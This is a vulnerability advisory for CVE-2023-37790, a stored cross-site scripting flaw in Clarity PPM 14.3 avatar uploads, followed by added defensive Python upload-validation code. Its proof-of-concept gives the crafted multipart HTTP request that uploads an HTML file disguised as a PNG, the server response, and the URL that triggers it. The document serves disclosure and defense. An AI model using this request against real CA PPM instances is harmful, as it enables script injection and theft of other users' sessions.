==================================================================================================================================
# Title                    : Insufficient input validation in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks.
# Author                   : Kaizen
# Tested on                : Windows 10 / browser: Chrome Version 114.0.5735.133 (Official Build) (x86_64)
# Vendor                   : https://www.broadcom.com/
# Dork                     : https://www.broadcom.com/products/software/value-stream-management/clarity
# Affected Product Version : Clarity PPM 14.3.0.298 / Jaspersoft
# CVE Assigned             : CVE-2023-37790
==================================================================================================================================

POC:

Header:
Content-Type: text/html; charset=utf-8

Payload:

HTTP Request:

POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1
[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"
Content-Type: text/html; charset=utf-8

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK
content-disposition: inline;filename="payload.png"
Content-Type: text/html;charset=utf-8
Content-Length: 90
Date: Thu, 06 Jul 2023 07:33:24 GMT
Connection: close
Server: CA PPM

To trigger the stored XSS, visit the user's profile picture:
https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true
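As an added, defender-side example (not part of the advisory and not CA PPM code), the following Python shows the two checks whose absence this PoC relies on: deriving the stored content type from the file's magic bytes instead of the multipart part's declared Content-Type or filename, and serving the stored avatar with a fixed image type, an attachment disposition and nosniff rather than echoing the uploaded Content-Type inline. Function names, the magic-byte table and the 2 MB limit (taken from the error string in the request URL) are the example's own assumptions.

```python
# Added example: validation and serving rules for an avatar-upload handler.
# Nothing here is CA PPM code; names and the sample inputs are constructed.
# Root cause in the advisory: the server stored the client-declared
# "text/html" Content-Type for a file named payload.png and later served the
# file inline with that same type, so the browser rendered it as a page.

MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
MAX_AVATAR_BYTES = 2 * 1024 * 1024  # 2 MB limit quoted in the request's error string


def sniff_image_type(data: bytes):
    """Return the image MIME type from the leading bytes, or None if unknown."""
    for sig, mime in MAGIC.items():
        if data.startswith(sig):
            return mime
    return None


def validate_avatar_upload(filename: str, declared_type: str, data: bytes):
    """Accept an upload only if its bytes are a real image.

    The declared Content-Type and the filename extension are untrusted input:
    they are cross-checked for consistency but never used as the stored type.
    Returns (True, sniffed_type) on success, (False, reason) otherwise."""
    if len(data) > MAX_AVATAR_BYTES:
        return False, "file too large"
    real_type = sniff_image_type(data)
    if real_type is None:
        return False, "not a supported image"
    if not declared_type.lower().startswith("image/"):
        return False, "declared type %s does not match image content" % declared_type
    if not filename.lower().endswith((".png", ".jpg", ".jpeg", ".gif")):
        return False, "unexpected file extension"
    return True, real_type


def response_headers_for_avatar(stored_type: str, filename: str):
    """Headers for serving a stored avatar: sniffed image type only, no inline
    rendering of an arbitrary type, and no browser MIME sniffing."""
    safe_name = "".join(c if c.isalnum() or c in "._-" else "_" for c in filename)
    return {
        "Content-Type": stored_type,
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",
    }
```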